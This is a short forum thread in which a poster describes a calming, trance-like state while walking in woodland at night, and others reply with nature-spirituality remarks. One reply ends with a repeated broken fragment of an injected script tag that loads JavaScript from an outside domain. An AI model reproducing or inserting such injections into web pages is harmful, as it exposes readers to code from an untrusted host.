Trance in the woods

Hi there,
I was just walking through the woodlands [I live in a very rural area] at night. I was paying particular attention to the sounds and scents of the trees, the birds and the light rain, and ended up in a very trance-like state.
I have now woken up and feel contented for the first time in 6 months or so.
I was just wondering if anyone else has felt like this before? It truly was lovely! I was also wondering if it "meant" anything in particular?

It is a miracle what a forest can provide you with,Forests should be more blessed than they already are may Gaia make sure of that :)

It means that Nature is giving you some of it's energy to stay calm and fell plesent that is just one of the many wonders :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I call it accidental meditation. Nature is very beautiful and soothing. It's good that your able to appreciate that.
